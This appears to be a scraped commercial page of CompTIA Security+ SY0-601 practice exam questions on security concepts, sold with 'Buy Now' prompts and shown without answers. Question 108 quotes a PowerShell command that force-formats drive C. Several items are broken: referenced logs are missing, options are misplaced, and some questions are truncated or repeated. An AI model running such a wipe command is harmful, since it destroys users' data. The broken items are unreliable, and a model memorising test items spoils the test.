New Year Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: cramtick70

SY0-601 CompTIA Security+ Exam 2023 Questions and Answers

Questions 4

While checking logs, a security engineer notices a number of end users suddenly downloading files with the.tar.gz extension-Closer examination of the files reveals they are PE32 files. The end users state they did not initiate any of the downloads. Further investigation reveals the end users all clicked on an external email containing an infected MHT file with an href link a week prior. Which of the following is MOST likely occurring?

Options:

A.

A RAT was installed and is transferring additional exploit tools.

B.

The workstations are beaconing to a command-and-control server.

C.

A logic bomb was executed and is responsible for the data transfers

D.

A fileless virus is spreading in the local network environment.

Buy Now
Questions 5

A security administrator received an alert for a user account with the following log activity:

Which of the following best describes the trigger for the alert the administrator received?

Options:

A.

Number of failed log-in attempts

B.

Geolocation

C.

Impossible travel time

D.

Time-based log-in attempt

Buy Now
Questions 6

An analyst is trying to identify insecure services that are running on the internal network. After performing a port scan, the analyst identifies that a server has some insecure services enabled on default ports. Which of the following BEST describes the services that are currently running and the secure alternatives for replacing them? (Select THREE).

Options:

A.

SFTP, FTPS

B.

SNMPv2, SNMPv3

C.

HTTP, HTTPS

D.

TFTP, FTP

E.

SNMPW1, SNMPv2

F.

Telnet, SSH

G.

TLS, SSL

Buy Now
Questions 7

Which of the following should a security administrator adhere to when setting up a new set of firewall rules?

Options:

A.

Disaster recovery plan

B.

Incident response procedure

C.

Business continuity plan

D.

Change management procedure

Buy Now
Questions 8

A help desk technician receives a phone call from someone claiming to be a part of the organization's cybersecurity incident response team. The caller asks the technician to verify the network's internal firewall IP address. Which of the following is the technician's best course of action?

Options:

A.

Direct the caller to stop by the help desk in person and hang up declining any further requests from the caller.

B.

Ask for the caller's name, verify the person's identity in the email directory, and provide the requested information over the phone.

C.

Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the organization's cybersecurity officer.

D.

Request the caller send an email for identity verification and provide the requested information via email to the caller.

Buy Now
Questions 9

Which of the following security controls s sed to isolate a section of the network and its externally available resources from the internal corporate network in order to reduce the number of

possible attacks?

Options:

A.

Faraday cages

B.

Air gap

C.

Vaulting

D.

Proximity readers

Buy Now
Questions 10

A Chief Information Security Officer has defined resiliency requirements for a new data center architecture. The requirements are as follows:

• Critical fileshares will remain accessible during and after a natural disaster.

• Five percent of hard disks can fail at any given time without impacting the data.

• Systems will be forced to shut down gracefully when battery levels are below 20%.

Which of the following are required to BEST meet these objectives? (Select THREE).

Options:

A.

Fiber switching

B.

laC

C.

NAS

D.

RAID

E.

UPS

F.

Redundant power supplies

G.

Geographic dispersal

Buy Now
Questions 11

Which of the following is an algorithm performed to verify that data has not been modified?

Options:

A.

Hash

B.

Code check

C.

Encryption

D.

Checksum

Buy Now
Questions 12

An organization is concerned about intellectual property theft by employees who leave the organization Which of the following should the organization most likely implement?

Options:

A.

CBT

B.

NDA

C.

MOU

D.

AUP

Buy Now
Questions 13

A security engineer must deploy two wireless routers in an office suite Other tenants in the office building should not be able to connect to this wireless network Which of the following protocols should the engineer implement to ensure the strongest encryption?

Options:

A.

WPS

B.

WPA2

C.

WAP

D.

HTTPS

Buy Now
Questions 14

A company's Chief Information Security Officer (CISO) recently warned the security manager that the company's Chief Executive Officer (CEO) is planning to publish a controversial opinion article in a national newspaper, which may result in new cyberattacks. Which of the following would be best for the security manager to use in a threat model?

Options:

A.

Hacktivists

B.

White-hat hackers

C.

Script kiddies

D.

Insider threats

Buy Now
Questions 15

A security administrator is performing an audit on a stand-alone UNIX server, and the following message is immediately displayed:

(Error 13) : /etc/shadow: Permission denied.

Which of the following best describes the type of tool that is being used?

Options:

A.

Pass-the-hash monitor

B.

File integrity monitor

C.

Forensic analysis

D.

Password cracker

Buy Now
Questions 16

Which of the following scenarios describes a possible business email compromise attack?

Options:

A.

An employee receives a gift card request m an email that has an executive's name m the display held to the email

B.

Employees who open an email attachment receive messages demanding payment m order to access files

C.

A service desk employee receives an email from the HR director asking for log-in credentials lo a cloud administrator account

D.

An employee receives an email with a link to a phishing site that is designed to look like the company's email portal.

Buy Now
Questions 17

A security analyst has been reading about a newly discovered cyberattack from a known threat actor Which of the following would best support the analyst's review of the tactics, techniques, and protocols the throat actor was observed using in previous campaigns?

Options:

A.

Security research publications

B.

The MITRE ATT4CK framework

C.

The Diamond Model of Intrusion Analysis

D.

The Cyber Kill Cham

Buy Now
Questions 18

A systems administrator needs to set up a secure, cloud-based file transfer environment between two data centers. Which of the following architecture models would meet this requirement?

Options:

A.

FTP

B.

HSM

C.

SDN

D.

PKI

Buy Now
Questions 19

A malicious actor compromised an entire cluster by exploiting a zero-day vulnerability in a unique container. The malicious actor then engaged in a lateral movement and compromised other containers and the host system. Which of the following container security practices has the GREATEST chance of preventing this attack from reoccurring?

Options:

A.

Deploying an IPS with updated signatures in line with the container cluster

B.

Implementing automatic scalability for containers exposed to the internet

C.

Updating the environment by using images with the tag: latest

D.

Executing containers using unprivileged credentials

Buy Now
Questions 20

A security engineer is implementing FDE for all laptops in an organization. Which of the following are the most important for the engineer to consider as part of the planning process? (Select two).

Options:

A.

Key escrow

B.

TPM presence

C.

Digital signatures

D.

Data tokenization

E.

Public key management

F.

Certificate authority linking

Buy Now
Questions 21

A hosting provider needs to prove that its security controls have been in place over the last six months and have sufficiently protected customer data. Which of the following would provide the best proof that the hosting provider has met the requirements?

Options:

A.

NIST CSF

B.

SOC 2 Type 2 report

C.

CIS Top 20 compliance reports

D.

Vulnerability report

Buy Now
Questions 22

Which of the following test describes the risk that is present once mitigations are applied?

Options:

A.

Control risk

B.

Residual risk

C.

Inherent risk

D.

Risk awareness

Buy Now
Questions 23

Server administrators want to configure a cloud solution so that computing memory and processor usage are maximized most efficiently across a number of virtual servers. They also need to avoid potential denial-of-service situations caused by availability. Which of the following should administrators configure to maximize system availability while efficiently utilizing available computing power?

Options:

A.

Dynamic resource allocation

B.

High availability

C.

Segmentation

D.

Container security

Buy Now
Questions 24

A company is expanding its threat surface program and allowing individuals to security test the company's internet-facing application. The company will compensate researchers based on the vulnerabilities discovered. Which of the following best describes the program the company is setting up?

Options:

A.

Open-source intelligence

B.

Bug bounty

C.

Red team

D.

Penetration testing

Buy Now
Questions 25

A company's web filter is configured to scan the URL for strings and deny access when matches are found. Which of the following search strings should an analyst employ to prohibit access to non-encrypted websites?

Options:

A.

encryption=off

B.

http://

C.

www.*.com

D.

:443

Buy Now
Questions 26

Which of the following is an administrative control that would be most effective to reduce the occurrence of malware execution?

Options:

A.

Security awareness training

B.

Frequency of NIDS updates

C.

Change control procedures

D.

EDR reporting cycle

Buy Now
Questions 27

A company is designing the layout of a new data center so it will have an optimal environmental temperature Which of the following must be included? (Select two).

Options:

A.

An air gap

B.

A cold aisle

C.

Removable doors

D.

A hot aisle

E.

An loT thermostat

F.

A humidity monitor

Buy Now
Questions 28

During a recent penetration test, a tester plugged a laptop into an Ethernet port in an unoccupied conference room and obtained a valid IP address. Which of the following would have best prevented this avenue of attack?

Options:

A.

Enabling MAC address filtering

B.

Moving printers inside a firewall

C.

Implementing 802.IX

D.

Using network port security

Buy Now
Questions 29

Which of the following is most likely to include a SCADA system?

  • Water treatment plant

  • Surveillance system

  • Smart watch

Options:

A.

Wi-Fi-enabled thermostat

Buy Now
Questions 30

During an investigation, events from two affected servers in the same subnetwork occurred at the same time:

Server 1: 192.168.10.1 [01/Apr/2021:06:00:00 PST] SAN access denied for user 'admin' Server 2: 192.168.10.6 [01/Apr/2021:06:01:01 CST] SAN access successful for user 'admin

Which of the following should be consistently configured to prevent the issue seen in the logs?

Options:

A.

Geolocation

B.

TOTP

C.

NTP

D.

MFA

Buy Now
Questions 31

A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible section of the company's website. The malicious actor posted an entry in an attempt to trick users into clicking the following:

Which of the following was most likely observed?

Options:

A.

DLL injection

B.

Session replay

C.

SQLi

D.

XSS

Buy Now
Questions 32

Which of the following holds staff accountable while escorting unauthorized personnel?

Options:

A.

Locks

B.

Badges

C.

Cameras

D.

Visitor logs

Buy Now
Questions 33

A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible section of the company's website. The malicious actor posted an entry in an attempt to trick users into clicking the following:

Which of the following was most likely observed?

Options:

A.

DLL injection

B.

Session replay

C.

SQLi

D.

xss

Buy Now
Questions 34

An internet company has created a new collaboration application. To expand the user base, the company wants to implement an option that allows users to log in to the application with the

credentials of her popular websites. Which of the following should the company implement?

Options:

A.

SSO

B.

CHAP

C.

802.1X

D.

OpenlD

Buy Now
Questions 35

A Chief Executive Officer's (CEO) personal information was stolen in a social-engineering attack. Which of the following sources would reveal if the CEO's personal information is for sale?

Options:

A.

Automated information sharing

B.

Open-source intelligence

C.

The dark web

D.

Vulnerability databases

Buy Now
Questions 36

A security engineer needs to recommend a solution to defend against malicious actors misusing protocols and being allowed through network defenses. Which of the following will the engineer most likely recommended?

Options:

A.

A content filter

B.

AWAF

C.

A next-generation firewall

D.

An IDS

Buy Now
Questions 37

Which of the following would be best suited for constantly changing environments?

Options:

A.

RTOS

B.

Containers

C.

Embedded systems

D.

SCADA

Buy Now
Questions 38

A host was infected with malware. During the incident response. Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would most likely show where the malware originated?

Options:

A.

The DNS logs

B.

The web server logs

C.

The SIP traffic logs

D.

The SNMP logs

Buy Now
Questions 39

A company recently experienced a data breach and the source was determined to be an executive who was charging a phone in a public area. Which of the following would most likely have prevented this breach?

Options:

A.

A firewall

B.

A device pin

C.

A USB data blocker

D.

Biometrics

Buy Now
Questions 40

Which of the following threat vectors would appear to be the most legitimate when used by a malicious actor to impersonate a company?

Options:

A.

Phone call

B.

Instant message

C.

Email

D.

Text message

Buy Now
Questions 41

Which of the following is the BEST action to foster a consistent and auditable incident response process?

Options:

A.

Incent new hires to constantly update the document with external knowledge.

B.

Publish the document in a central repository that is easily accessible to the organization.

C.

Restrict eligibility to comment on the process to subject matter experts of each IT silo.

D.

Rotate CIRT members to foster a shared responsibility model in the organization

Buy Now
Questions 42

A network administrator added a new router to the network. Which of the following should the administrator do first when configuring the router?

Options:

A.

Isolate the router.

B.

Apply patches.

C.

Remove unnecessary software.

D.

Change the default passwords.

Buy Now
Questions 43

A systems administrator receives the following alert from a file integrity monitoring tool:

The hash of the cmd.exe file has changed.

The systems administrator checks the OS logs and notices that no patches were applied in the last two months. Which of the following most likely occurred?

Options:

A.

The end user changed the file permissions.

B.

A cryptographic collision was detected.

C.

A snapshot of the file system was taken.

D.

A rootkit was deployed.

Buy Now
Questions 44

A company has had several malware incidents that have been traced back to users accessing personal SaaS applications on the internet from the company network. The company has a policy that states users can only access business-related cloud applications from within the company network. Which of the following technical solutions should be used to enforce the policy?

Options:

A.

Implement single sign-on using an identity provider.

B.

Leverage a cloud access security broker.

C.

Configure cloud security groups.

D.

Install a virtual private cloud endpoint.

Buy Now
Questions 45

Which of the following is best to use when determining the severity of a vulnerability?

Options:

A.

CVE

B.

OSINT

C.

SOAR

D.

CVSS

Buy Now
Questions 46

The local administrator account for a company's VPN appliance was unexpectedly used to log in to the remote management interface. Which of the following would have prevented this from happening?

Options:

A.

Using least privilege

B.

Changing the default password

C.

Assigning individual user IDs

D.

Implementing multifactor authentication

Buy Now
Questions 47

A systems administrator is auditing all company servers to ensure they meet the minimum security baseline While auditing a Linux server the systems administrator observes the /etc/ahadow file has permissions beyond the baseline recommendation. Which of the following commands should the systems administrator use to resolve this issue?

Options:

A.

chmod

B.

grep

C.

dd

D.

passwd

Buy Now
Questions 48

A company located in an area prone to hurricanes is developing a disaster recovery plan and looking at site considerations that allow the company to quickly continue operations. Which of the following is the best type of site for this company?

Options:

A.

Cold

B.

Tertiary

C.

Warm

D.

Hot

Buy Now
Questions 49

A security analyst discovers that a large number of employee credentials had been stolen and were being sold on the dark web. The analyst investigates and discovers that some hourly employee credentials were compromised, but salaried employee credentials were not affected.

Most employees clocked in and out while they were inside the building using one of the kiosks connected to the network. However, some clocked out and recorded their time after leaving to go home. Only those who clocked in and out while inside the building had credentials stolen. Each of the kiosks are on different floors, and there are multiple routers, since the business segments environments for certain business functions.

Hourly employees are required to use a website called acmetimekeeping.com to clock in and out. This website is accessible from the internet. Which of the following is the most likely reason for this compromise?

Options:

A.

A brute-force attack was used against the time-keeping website to scan for common passwords.

B.

A malicious actor compromised the time-keeping website with malicious code using an unpatched vulnerability on the site, stealing the credentials.

C.

The internal DNS servers were poisoned and were redirecting acmetimekeeping.com to a malicious domain that intercepted the credentials and then passed them through to the real site.

D.

ARP poisoning affected the machines in the building and caused the kiosks to send a copy of all the submitted credentials to a malicious machine.

Buy Now
Questions 50

An IT security team is concerned about the confidentiality of documents left unattended in MFPs. Which of the following should the security team do to mitigate the situation?

Options:

A.

Educate users about the importance of paper shredder devices.

B.

Deploy an authentication factor that requires in-person action before printing.

C.

Install a software client in every computer authorized to use the MFPs.

D.

Update the management software to utilize encryption.

Buy Now
Questions 51

An organization relies on third-party videoconferencing to conduct daily business. Recent security changes now require all remote workers to utilize a VPN to corporate resources Which of the following would best maintain high-quality videoconferencing while minimizing latency when connected to the VPN?

Options:

A.

Using geographic diversity lo have VPN terminators closer to end users

B.

Utilizing split tunneling so only traffic for corporate resources is encrypted

C.

Purchasing higher bandwidth connections to meet the increased demand

D.

Configuring OoS properly on the VPN accelerators

Buy Now
Questions 52

Which of the following roles, according to the shared responsibility model, is responsible for securing the company's database in an laaS model for a cloud environment?

Options:

A.

Client

B.

Third-party vendor

C.

Cloud provider

D.

DBA

Buy Now
Questions 53

A company currently uses passwords for logging in to company-owned devices and wants to add a second authentication factor Per corporate policy, users are not allowed to have smartphones at their desks Which of the following would meet these requirements?

Options:

A.

Smart card

B.

PIN code

C.

Knowledge-based question

D.

Secret key

Buy Now
Questions 54

A sensitive piece of information in a production database is replaced with a non-sensitive value that, when compromised, provides no value to the offender. Which of the following describes this process?

Options:

A.

Tokenization

B.

Obfuscation

C.

Masking

D.

Hashing

Buy Now
Questions 55

A systems administrator set up an automated process that checks for vulnerabilities across the entire environment every morning. Which of the following activities is the systems administrator conducting?

Options:

A.

Scanning

B.

Alerting

C.

Reporting

D.

Archiving

Buy Now
Questions 56

Security analysts are conducting an investigation of an attack that occurred inside the organization's network. An attacker was able to coiled network traffic between workstations throughout the network The analysts review the following logs:

The Layer 2 address table has hundreds of entries similar to the ones above Which of the following attacks has most likely occurred?

Options:

A.

SQL injection

B.

DNS spoofing

C.

MAC flooding

D.

ARP poisoning

Buy Now
Questions 57

Local guidelines require that all information systems meet a minimum security baseline to be compliant Which of the following can security administrators use to assess their system configurations against the baseline?

Options:

A.

SOAR playbook

B.

Security control matrix

C.

Risk management framework

D.

Benchmarks

Buy Now
Questions 58

A security analyst needs to centrally manage credentials and permissions to the company's network devices. The following security requirements must be met:

• All actions performed by the network staff must be logged.

• Per-command permissions must be possible.

• The authentication server and the devices must communicate through TCP.

Which of the following authentication protocols should the analyst choose?

Options:

A.

Kerberos

B.

CHAP

C.

TACACS+

D.

RADIUS

Buy Now
Questions 59

A security analyst is creating baselines for the server team to follow when hardening new devices for deployment. Which of the following best describes what the analyst is creating?

Options:

A.

Change management procedure

B.

Information security policy

C.

Cybersecurity framework

D.

Secure configuration guide

Buy Now
Questions 60

A large industrial system's smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company's security manager notices the generator's IP is sending packets to an internal file server's IP. Which of the following mitigations would be best for the security manager to implement while maintaining alerting capabilities?

Options:

A.

Segmentation

B.

Firewall allow list

C.

Containment

D.

Isolation

Buy Now
Questions 61

An organization is concerned that ils hosted web servers are not running the most updated version of the software. Which of the following would work best to help identify potential vulnerabilities?

Options:

A.

hping3 -S compcia.org -p 80

B.

nc -1 -v comptia.crg -p 80

C.

nmap comptia.org -p 80 -sv

D.

nslookup -port«80 comptia.org

Buy Now
Questions 62

Which of the following describes a social engineering technique that may include scam emails addressed directly to the Chief Financial Officer?

Options:

A.

Vishing

B.

Spear phishing

C.

Smishing

D.

Pharming

Buy Now
Questions 63

A network administrator deployed a DNS logging tool that logs suspicious websites that are visited and then sends a daily report based on various weighted metrics. Which of the following best describes the type of control the administrator put in place?

Options:

A.

Preventive

B.

Deterrent

C.

Corrective

D.

Detective

Buy Now
Questions 64

A company's end users are reporting that they are unable to reach external websites. After reviewing the performance data for the DNS severs, the analyst discovers that the CPU, disk, and memory usage are minimal, but the network interface is flooded with inbound traffic. Network logs show only a small number of DNS queries sent to this server. Which of the following best describes what the security analyst is seeing?

Options:

A.

Concurrent session usage

B.

Secure DNS cryptographic downgrade

C.

On-path resource consumption

D.

Reflected denial of service

Buy Now
Questions 65

A Chief Security Officer (CSO) is concerned that cloud-based services are not adequately protected from advanced threats and malware. The CSO believes there is a high risk that a data breach could occur in the near future due to the lack of detective and preventive controls Which of the following should be implemented to best address the CSO's concerns? (Select two).

Options:

A.

AWAF

B.

A CASB

C.

An NG-SWG

D.

Segmentation

E.

Encryption

F.

Containenzation

Buy Now
Questions 66

Callers speaking a foreign language are using company phone numbers to make unsolicited phone calls to a partner organization. A security analyst validates through phone system logs that the calls are occurring and the numbers are not being spoofed. Which of the following is the most likely explanation?

Options:

A.

The executive team is traveling internationally and trying to avoid roaming charges.

B.

The company's SIP server security settings are weak.

C.

Disgruntled employees are making calls to the partner organization.

D.

The service provider has assigned multiple companies the same numbers.

Buy Now
Questions 67

recovery sites is the best option?

Options:

A.

Hot

B.

Cold

C.

Warm

D.

Geographically dispersed

Buy Now
Questions 68

Which of the following describes a security alerting and monitoring tool that collects system, application, and network logs from multiple sources in a centralized system?

Options:

A.

SIEM

B.

DLP

C.

IDS

D.

SNMP

Buy Now
Questions 69

Security controls in a data center are being reviewed to ensure data is properly protected and that human life considerations are included. Which of the following best describes how the controls should be set up?

Options:

A.

Remote access points should fail closed.

B.

Logging controls should fail open.

C.

Safety controls should fail open.

D.

Logical security controls should fail closed.

Buy Now
Questions 70

A company wants to improve its access standards to prevent threat actors from togging in to the corporate network with compromised credentials in addition to MFA. the Chief Information Security Officer wants an additional layer of protection enabled based on certain criteria Which of the following is the best way to provide additional protection?

Options:

A.

Conditional access policies

B.

Kerbaos access ticketing

C.

Terminal access controller

D.

Enabled key vaults

Buy Now
Questions 71

A software developer would like to ensure the source code cannot be reverse engineered or debugged. Which of the following should the developer consider?

Options:

A.

version control

B.

Obfuscation toolkit

C.

Code reuse

D.

Continuous integration

E.

Stored procedures

Buy Now
Questions 72

Which of the following describes an executive team that is meeting in a board room and testing the company's incident response plan?

Options:

A.

Continuity of operations

B.

Capacity planning

C.

Tabletop exercise

D.

Parallel processing

Buy Now
Questions 73

A security analyst finds that a user's name appears in a database entry at a time when the user was on vacation. The security analyst reviews the following logs from the authentication server that is being used by the database:

Which of the following can the security analyst conclude based on the review?

Options:

A.

A brute-force attack occurred.

B.

A rainbow table uncovered the password.

C.

Technical controls did not block the reuse of a password.

D.

An attacker used password spraying.

Buy Now
Questions 74

A security team discovers a vulnerability that does not have a patch available. The team determines the vulnerability is critical. Which of the following should the security engineers do to address the vulnerability?

Options:

A.

Withhold information about the discovered vulnerability so attackers cannot exploit the company's systems.

B.

Announce the discovery on social media and apply compensating controls.

C.

Inform the vendor of this discovery in a secure manner and apply appropriate mitigations.

D.

Provide the discovered vulnerability to the local authorities

Buy Now
Questions 75

A security analyst is reviewing the following logs:

[10:00:00 AM] Login rejected - username administrator - password Spring2023

[10:00:01 AM] Login rejected - username jsmith - password Spring2023

[10:00:01 AM] Login rejected - username guest - password Spring2023

[10:00:02 AM] Login rejected - username cpolk - password Spring2023

[10:00:03 AM] Login rejected - username fmarbin - password Spring2023

Which of the following attacks is most likely occurring?

Options:

A.

Password spraying

B.

Account forgery

C.

Pass-the-hash

D.

Brute-force

Buy Now
Questions 76

An IT manager informs the entire help desk staff that only the IT manager and the help desk lead will have access to the administrator console of the help desk software. Which of the following security techniques is the IT manager setting up?

Options:

A.

Hardening

B.

Employee monitoring

C.

Configuration enforcement

D.

Least privilege

Buy Now
Questions 77

A company is utilizing an offshore team to help support the finance department. The company wants to keep the data secure by keeping it on a company device but does not want to provide equipment to the offshore team. Which of the following should the company implement to meet this requirement?

Options:

A.

VDI

B.

MDM

C.

VPN

D.

VPC

Buy Now
Questions 78

A systems administrator wants to prevent users from being able to access data based on their responsibilities. The administrator also wants to apply the required access structure via a simplified format. Which of the following should the administrator apply to the site recovery resource group?

Options:

A.

RBAC

B.

ACL

C.

SAML

D.

GPO

Buy Now
Questions 79

A security analyst reviews web server logs and notices the following line:

Which of the following vulnerabilities is the attacker trying to exploit?

Options:

A.

Token reuse

B.

SQL injection

C.

Server side request forgery

D.

Cross-site scripting

Buy Now
Questions 80

Which of the following describes the understanding between a company and a client about what will be provided and the accepted time needed to provide the company with the resumes?

Options:

A.

SLA

B.

MOU

C.

MOA

D.

BPA

Buy Now
Questions 81

An employee in the accounting department receives an email containing a demand for payment for services performed by a vendor. However, the vendor is not in the vendor management database. Which of the following is this scenario an example of?

Options:

A.

Pretexting

B.

Impersonation

C.

Ransomware

D.

Invoice scam

Buy Now
Questions 82

An employee fell for a phishing scam, which allowed an attacker to gain access to a company PC. The attacker scraped the PC's memory to find other credentials. Without cracking these credentials, the attacker used them to move laterally through the corporate network. Which of the following describes this type of attack?

Options:

A.

Privilege escalation

B.

Buffer overflow

C.

SQL injection

D.

Pass-the-hash

Buy Now
Questions 83

A security administrator needs to improve the security at an entry kiosk. Currently, employees enter an employee number and PIN at a PC to enter the building.

Which of the following is the best solution to improve security at the entry kiosk?

Options:

A.

Single sign. On

B.

Smart card

C.

Password

D.

Challenge questions

Buy Now
Questions 84

Which of the following provides guidelines for the management and reduction of information security risk?

Options:

A.

CIS

B.

NISTCSF

C.

ISO

D.

PCIDSS

Buy Now
Questions 85

A security administrator is deploying a DLP solution to prevent the exfiltration of sensitive customer data. Which of the following should the administrator do first?

Options:

A.

Block access to cloud storage websites.

B.

Create a rule to block outgoing email attachments.

C.

Apply classifications to the data.

D.

Remove all user permissions from shares on the file server.

Buy Now
Questions 86

Which of the following would best explain why a security analyst is running daily vulnerability scans on all corporate endpoints?

Options:

A.

To track the status of patching installations

B.

To find shadow IT cloud deployments

C.

To continuously the monitor hardware inventory

D.

To hunt for active attackers in the network

Buy Now
Questions 87

Which of the following is most likely to include a SCADA system?

Options:

A.

Water treatment plant

B.

Surveillance system

C.

Smart watch

D.

Wi-Fi-enabled thermostat

Buy Now
Questions 88

A network engineer deployed a redundant switch stack to increase system availability. However, the budget can only cover the cost of one ISP connection. Which of the following best describes the potential risk factor?

Options:

A.

The equipment MTBF is unknown.

B.

The ISP has no SLA.

C.

An RPO has not been determined.

D.

There is a single point of failure.

Buy Now
Questions 89

An enterprise has been experiencing attacks focused on exploiting vulnerabilities in older browser versions with well-known exploits. Which of the following security solutions should be configured to best provide the ability to monitor and block these known signature-based attacks?

Options:

A.

ACL

B.

DLP

C.

IDS

D.

IPS

Buy Now
Questions 90

Which of the following permits consistent, automated deployment rather than manual provisioning of data centers?

Options:

A.

Transit gateway

B.

Private cloud

C.

Containerization

D.

Infrastructure as code

Buy Now
Questions 91

A company recently decided to allow employees to work remotely. The company wants to protect its data without using a VPN. Which of the following technologies should the company implement?

Options:

A.

Secure web gateway

B.

Virtual private cloud endpoint

C.

Deep packet inspection

D.

Next-generation firewall

Buy Now
Questions 92

After a security awareness training session, a user called the IT help desk and reported a suspicious call. The suspicious caller stated that the Chief Financial Officer wanted credit card information in order to close an invoice. Which of the following topics did the user recognize from the training?

Options:

A.

Insider threat

B.

Email phishing

C.

Social engineering

D.

Executive whaling

Buy Now
Questions 93

During the past year, an organization has experienced several intellectual property leaks by an unidentified source. Which of the following risk management policies will help the company identify the source of this issue?

Options:

A.

Requiring all personnel to sign an acceptable use policy

B.

Implementing mandatory vacations

C.

Conducting criminal background checks

D.

Applying data retention standards to all databases

Buy Now
Questions 94

Which of the following is used to describe discrete characteristics of a potential weakness that results in a seventy number?

Options:

A.

CVSS

B.

CVE

C.

CAR

D.

CERT

Buy Now
Questions 95

Which of the following should a security operations center use to improve its incident response procedure?

Options:

A.

Playbooks

B.

Frameworks

C.

Baselines

D.

Benchmarks

Buy Now
Questions 96

A utility company is designing a new platform that will host all the virtual machines used by business applications. The requirements include

• A starting baseline of 50% memory utilization

• Storage scalability

• Single circuit failure residence

Which of the following best meets all of these requirements?

Options:

A.

Connecting dual PDUs to redundant power supplies

B.

Transitioning the platform to an laaS provider

C.

Configuring network load balancing for multiple paths

D.

Deploying multiple large NAS devices for each host

Buy Now
Questions 97

A systems administrator notices that one of the systems critical for processing customer transactions is running an end-of-life operating system. Which of the following techniques would increase enterprise security?

Options:

A.

Installing HIDS on the system

B.

Placing the system in an isolated VLAN

C.

Decommissioning the system

D.

Encrypting the system's hard drive

Buy Now
Questions 98

An organization wants to reduce the likelihood that a data breach could result in reputational. financial, or regulatory consequences. The organization needs an enterprise-wide solution that does not require new technology or specialized roles Which of the following describes the best way to achieve these goals?

Options:

A.

Developing a process where sensitive data is converted to non-sensitive values such as a token

B.

Masking identifiable information so the data cannot be traced back to a specific user

C.

Incorporating the principle of data minimization throughout business processes

D.

Requiring users and customers to consent to the processing of their information

Buy Now
Questions 99

A security analyst is working with a vendor to get a new SaaS application deployed to an enterprise. The analyst wants to ensure role-based security policies are correctly applied as users access the application. Which of the following is most likely to solve the issue?

Options:

A.

CASB

B.

AUP

C.

NG-SWG

D.

VPC endpoint

Buy Now
Questions 100

A company wants to get alerts when others are researching and doing reconnaissance on the company. One approach would be to host a part of the infrastructure online with known vulnerabilities that would appear to be company assets. Which of the following describes this approach?

Options:

A.

Watering hole

B.

Bug bounty

C.

DNS sinkhole

D.

Honeypot

Buy Now
Questions 101

An analyst observed an unexpected high number of DE authentication on requests being sent from an unidentified device on the network. Which of the following attacks was most likely executed in this scenario?

Options:

A.

Jamming

B.

Blue jacking

C.

Rogue access point

D.

Disassociation

Buy Now
Questions 102

A vulnerability scan returned the following results:

2 Critical

5 High

15 Medium

98 Low

Which of the following would the information security team most likely use to decide if all discovered vulnerabilities must be addressed and the order in which they should be addressed?

Options:

A.

Risk appetite

B.

Risk register

C.

Risk matrix

D.

Risk acceptance

Buy Now
Questions 103

Which of the following should a systems administrator use to ensure an easy deployment of resources within the cloud provider?

Options:

A.

Software as a service

B.

Infrastructure as code

C.

Internet of Things

D.

Software-defined networking

Buy Now
Questions 104

A company is auditing the manner in which its European customers’ personal information is handled. Which of the following should the company consult?

Options:

A.

GDPR

B.

ISO

C.

NIST

D.

PCI DSS

Buy Now
Questions 105

An organization has expanded its operations by opening a remote office. The new office is fully furnished with office resources to support up to 50 employees working on any given day. Which of the following VPN solutions would best support the new office?

Options:

A.

Always-on

B.

Remote access

C.

Site-to-site

D.

Full tunnel

Buy Now
Questions 106

A network penetration tester has successfully gained access to a target machine. Which of the following should the penetration tester do next?

Options:

A.

Clear the log files of all evidence

B.

Move laterally to another machine.

C.

Establish persistence for future use.

D.

Exploit a zero-day vulnerability.

Buy Now
Questions 107

Which of the following roles is responsible for defining the protection type and Classification type for a given set of files?

Options:

A.

General counsel

B.

Data owner

C.

Risk manager

D.

Chief Information Officer

Buy Now
Questions 108

A user downloaded an extension for a browser, and the user's device later became infected. The analyst who Is Investigating the Incident saw various logs where the attacker was hiding activity by deleting data. The following was observed running:

New-Partition -DiskNumber 2 -UseMaximumSize -AssignDriveLetter C| Format-Volume -Driveletter C - FileSystemLabel "New"-FileSystem NTFS - Full -Force -Confirm:$false

Which of the following is the malware using to execute the attack?

Options:

A.

PowerShell

B.

Python

C.

Bash

D.

Macros

Buy Now
Questions 109

An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following would be the most acceptable?

Options:

A.

SED

B.

HSM

C.

DLP

D.

TPM

Buy Now
Questions 110

A security analyst needs to implement security features across smartphones. laptops, and tablets. Which of the following would be the most effective across heterogeneous platforms?

Options:

A.

Enforcing encryption

B.

Deploying GPOs

C.

Removing administrative permissions

D.

Applying MDM software

Buy Now
Questions 111

A company's help desk has received calls about the wireless network being down and users being unable to connect to it. The network administrator says all access pcints are up and running. One of the help desk technicians notices the affected users are working in a near the parking Jot Which Of the following IS the most likely reason for the outage?

Options:

A.

Someone near the is jamming the signal.

B.

A user has set up a rogue access point near building.

C.

Someone set up an evil twin access Print in the affected area.

D.

The APS in the affected area have been from the network

Buy Now
Questions 112

During a recent security assessment, a vulnerability was found in a common OS. The OS vendor was unaware of the issue and promised to release a patch within the next quarter. Which of the following best describes this type of vulnerability?

Options:

A.

Legacy operating system

B.

Weak configuration

C.

Zero day

D.

Supply chain

Buy Now
Questions 113

An information security officer at a credit card transaction company is conducting a framework-mapping exercise with the internal controls. The company recently established a new office in Europe. To which of the following frameworks should the security officer map the existing controls' (Select two).

Options:

A.

ISO

B.

PCI DSS

C.

SOC

D.

GDPR

E.

CSA

F.

NIST

Buy Now
Questions 114

During the onboarding process, an employee needs to create a password for an intranet account. The password must include ten characters, numbers, and letters, and two special characters. Once the password is created, the ‘company will grant the employee access to other company-owned websites based on the intranet profile. Which of the following access management concepts is the company most likely using to safeguard intranet accounts and grant access to multiple sites based on a user's intranet account? (Select two).

Options:

A.

Federation

B.

Identity proofing

C.

Password complexity

D.

Default password changes

E.

Password manager

F.

Open authentication

Buy Now
Questions 115

Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer's Pll?

Options:

A.

SCAP

B.

NetFlow

C.

Antivirus

D.

DLP

Buy Now
Questions 116

A company recently suffered a breach in which an attacker was able to access the internal mail servers and directly access several user inboxes. A large number of email messages were later posted online. Which of the following would bast prevent email contents from being released should another breach occur?

Options:

A.

Implement S/MIME to encrypt the emails at rest.

B.

Enable full disk encryption on the mail servers.

